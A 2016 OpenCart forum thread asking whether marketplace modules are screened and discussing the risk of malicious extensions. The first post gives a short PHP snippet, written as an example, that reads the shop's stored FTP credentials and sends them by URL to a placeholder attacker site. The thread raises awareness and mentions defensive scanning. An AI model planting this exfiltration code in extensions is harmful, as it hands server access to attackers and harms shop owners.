Post by Tomit » Wed Dec 28, 2016 12:19 am

I was just wondering, do the modules get screened before they are added to the marketplace?

I think there should be a permission system within opencart, to which the modules need to ask permission to access certain configuration data.

What would stop anyone with bad intent from getting your server data?
all they need is upload a free module that looks awesome and add an ocmodfile with something like this:

Code: Select all

$u = $this->config->get('config_ftp_username');
$p = $this->config->get('config_ftp_password');
$updateFeed = file_get_contents("http://mymalicouswebsiteurll/i_got_your_ftp_credentials.php?username=$u&password=$p");
And they have full ftp access to your account..

not many people will really check the files they are installing, and your server could get compromised without you knowing anything is wrong.

Image


New member

Posts

Joined
Sat Sep 14, 2013 9:54 pm
Location - Netherlands

Post by IP_CAM » Wed Dec 28, 2016 1:31 am

Nope, they are not, everybody is free, to offer Mod's and Themes. In addition, uncounted Websites exist, offering their own Additions, so, it would be impossible, to keep control. It's therefore the sole responsibility of OC Users, to make sure, to run a secure Shop, and if one aquires Extensions, partly even from unknown sources, it cannot be the problem of OC.

This, especially under the Aspect, that Sites exist, offering paid OC-Extensions for free, for what reason ever. And some of them possibly add their own STUFF to some Extensions, in order, to possibly still participate some day, by gaining access, and so be able, to steal other paid Extensions, Programs, and/or Data from such Servers.

Just accept it, as it is. And make sure, to keep your Shop Site clean. That's all, you can do about. Good Luck ! ;)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by thekrotek » Wed Dec 28, 2016 4:29 am

I feel your pain, bro. But don't get too pesky about it, since most developers (and I mean 99.99999999999999% of them) are the good guys. If a single schmuck ever inject something in his code, he'll get reported and banned instantly.

If you're worried about security, you can add a simple script to your site and run it after every extension installation/setup. There're tons of scripts, that check for basic exploits like base64_encode stuff or any kind of file requests. If you're a good programmer, you can even write your own. They all based on the same logic anyway.

Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com


User avatar
Expert Member

Posts

Joined
Sun Jul 03, 2016 12:24 am

Who is online

Users browsing this forum: No registered users and 44 guests